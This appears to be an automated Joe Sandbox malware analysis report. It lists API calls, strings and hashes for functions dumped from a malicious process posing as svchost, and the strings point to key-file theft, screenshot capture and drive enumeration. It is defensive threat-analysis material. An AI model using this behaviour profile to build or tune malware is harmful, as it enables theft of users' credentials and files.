                                                                                                                                                                                                            • API ID: Error$LastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Mode
                                                                                                                                                                                                            • String ID: .txt$.zip$6D1DA354$keys$path
                                                                                                                                                                                                            • API String ID: 3293890905-2325907159
                                                                                                                                                                                                            • Opcode ID: e3d100074f92705510d1429fcbc914268e46e4abc397a2cd9195c4c0cc4227d6
                                                                                                                                                                                                            • Instruction ID: aee6f32301bdcdfa9a6d4cc34bc4f8d0ee578be413322cb3f489d5fcad6d9f42
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3d100074f92705510d1429fcbc914268e46e4abc397a2cd9195c4c0cc4227d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB81E9315086868FC716DB3894687ABBBE5EFC5349F18CA58E8CAD7241EB31D509C781
                                                                                                                                                                                                            Function 02C89BE0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 189memoryfilestringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C89C00
                                                                                                                                                                                                              • Part of subcall function 02C89B20: PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89B47
                                                                                                                                                                                                              • Part of subcall function 02C89B20: GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                              • Part of subcall function 02C89B20: PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89C48
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C89CB0
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C89CBD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380,?,?), ref: 02C89CF7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C89D7A
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C89D8E
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C89DA1
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02C89DD0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89DDB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89DFE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C89E01
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89E0E
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C89E11
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 5NT$6D1DA380$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 2685098104-1683899619
                                                                                                                                                                                                            • Opcode ID: c76f9a911eba22ee1312f3e01cc86fb43b923aab6fb7c8ea42aaa922a96ca9e6
                                                                                                                                                                                                            • Instruction ID: c06213b1eed9abbb4c11ff5360907248da8ade7d6854d3c723d800ba307d5478
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c76f9a911eba22ee1312f3e01cc86fb43b923aab6fb7c8ea42aaa922a96ca9e6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06517931A406855FDB129B389C98BF6BFE89F81308F1485E5E986DB341EB719948CB50
                                                                                                                                                                                                            Function 02C8E920 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 150memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(02C7136E,\java\,?,75495180,00000000,?,?,02C7136E,?,?), ref: 02C8E959
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(02C7136E,\windows\,?,?,02C7136E,?,?), ref: 02C8E969
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E97C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,?,?,02C7136E,?,?), ref: 02C8E998
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8E99F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8E9AF
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E9CF
                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02C8E9E4
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(?,?,?,?,02C7136E,?,?), ref: 02C8EA05
                                                                                                                                                                                                            • ReadFile.KERNEL32 ref: 02C8EA32
                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,75495180,00000000,?,?,02C7136E,?,?), ref: 02C8EA8E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAA1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAA4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAB1
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAB4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$ByteCharMultiWide$AllocFreeNamePathPointerReadShortSizeValidatememset
                                                                                                                                                                                                            • String ID: \java\$\windows\$iBKS
                                                                                                                                                                                                            • API String ID: 3070551764-2513530025
                                                                                                                                                                                                            • Opcode ID: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                            • Instruction ID: ff8bf14a6dcb9fd73a4fdef842a0580c8f30e8ec5885aa7bb6a116afd196ec38
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5041C471A843616BE721AF259C48FBB7AACFFC4F19F048618F814D71C0EB70DA0586A1
                                                                                                                                                                                                            Function 02C82140 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 97stringthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82160
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C821A8
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,id=,user!965543!09C06683), ref: 02C821BE
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C821C6
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000,?,id=,user!965543!09C06683), ref: 02C821CD
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!965543!09C06683), ref: 02C821EF
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!965543!09C06683), ref: 02C821F6
                                                                                                                                                                                                              • Part of subcall function 02C82030: memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                              • Part of subcall function 02C82030: GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                              • Part of subcall function 02C82030: SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                              • Part of subcall function 02C82030: _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                              • Part of subcall function 02C82030: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                              • Part of subcall function 02C82030: WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,75569300), ref: 02C820FB
                                                                                                                                                                                                              • Part of subcall function 02C82030: GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                              • Part of subcall function 02C82030: CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!965543!09C06683), ref: 02C8223F
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!965543!09C06683), ref: 02C82246
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Drive$Type$CurrentFileHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLogicalModePriorityStringsWrite_snprintf
                                                                                                                                                                                                            • String ID: AppEvents$Console$Control Panel$Environment$user!965543!09C06683$Identities$Software$System$id=
                                                                                                                                                                                                            • API String ID: 3198928771-1118685808
                                                                                                                                                                                                            • Opcode ID: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                            • Instruction ID: 21637d07351c62209abd453d13aea30da296579d93d7853852444d9999779526
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E31F6B1980294AFD712EFE49C4D79EBB69EF8031CF904698ED08A7140D7704E55CF96
                                                                                                                                                                                                            Function 02C8B100 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B127
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B175
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B181
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B185
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B196
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B19D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8B1D0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B1DF
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B1E5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B1E9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B1FA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B201
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8B22F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C8B245
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6D1DA3E6$scrs
                                                                                                                                                                                                            • API String ID: 1455050916-1868188365
                                                                                                                                                                                                            • Opcode ID: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
                                                                                                                                                                                                            • Instruction ID: 1702d08459725db940bfbe12de1844016283b2e0f2e6e241e9736916e4f7f2d0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48315B72D402585BCB21DB749C88BEB77A8EF85308F4446D4EA89D7100DF70DA59CBA0
                                                                                                                                                                                                            Function 02C90120 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da03d), ref: 02C90147
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90195
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C901A1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C901A5
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C901B6
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C901BD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C901F0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C901FF
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90205
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C90209
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9021A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C90221
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C9024F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C90265
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da03d$scrs
                                                                                                                                                                                                            • API String ID: 1455050916-4206254920
                                                                                                                                                                                                            • Opcode ID: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
                                                                                                                                                                                                            • Instruction ID: 9288b0c1c4f02724dd8a4a36e7fd7d1f34b3c2ca216c9da405f7a4d7332aa7bc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2531F672D402995BDF269B74AC9CBEB77A8AF85300F4446D4EA89D3100DF70DA59CBA0
                                                                                                                                                                                                            Function 02C8E0B0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0CC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8E0E2
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0F0
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E0F9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E117
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E125
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8DCE0,00000000,00000000,00000000), ref: 02C8E13A
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C8E14B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8E150
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E164
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E172
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA), ref: 02C8E17D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA2CA,FAKTURA), ref: 02C8E197
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6D1DA2CA$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Wu
                                                                                                                                                                                                            • API String ID: 2736094147-773477533
                                                                                                                                                                                                            • Opcode ID: f9032c7081471ea81e07acd4e2152d90b91346d408efa5e92d328250e3b16b25
                                                                                                                                                                                                            • Instruction ID: bf16f44e971ad8498760596df9b01a7b91daa047f741fd308cd832d96a808c2e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9032c7081471ea81e07acd4e2152d90b91346d408efa5e92d328250e3b16b25
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05214931EC07557AF322B7608C0AF6A738C9F85B29F148B18FE14631C1CBB0E9014AA6
                                                                                                                                                                                                            Function 02C8FEE0 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FEFC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8FF12
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FF20
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8FF29
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF47
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8FF55
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8FC70,00000000,00000000,00000000), ref: 02C8FF6A
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C8FF7B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8FF80
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF94
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8FFA2
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA), ref: 02C8FFAD
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA0AA,INTER), ref: 02C8FFC7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6D1DA0AA$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 2736094147-763215909
                                                                                                                                                                                                            • Opcode ID: 907e5e26e8d5542c8c50e34ba71709dec2d9fb3d4b685af24d6e812faa946f8f
                                                                                                                                                                                                            • Instruction ID: e4c67908672cb35a4f12d2071a62a49761df94f8fdfc2e1b32ad9ce2f8eda8f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 907e5e26e8d5542c8c50e34ba71709dec2d9fb3d4b685af24d6e812faa946f8f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10210A31AC47543BF312B7649C0AF5A73CCAF45B69F548758FE14A31C1DBB0A9018AB6
                                                                                                                                                                                                            Function 02C77370 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 156synchronizationmemorythreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7738C
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C77393
                                                                                                                                                                                                            • SetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C7739F
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                              • Part of subcall function 02C7CBF0: memset.MSVCRT ref: 02C7CC09
                                                                                                                                                                                                              • Part of subcall function 02C7CBF0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02C7CC22
                                                                                                                                                                                                              • Part of subcall function 02C98320: malloc.MSVCRT ref: 02C98332
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02C77437
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02C77445
                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,fuck), ref: 02C7744F
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02C774F2
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77501
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02C77530
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7753F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7754D
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02C77556
                                                                                                                                                                                                            • Sleep.KERNEL32(00002710,?,00000000), ref: 02C7759C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
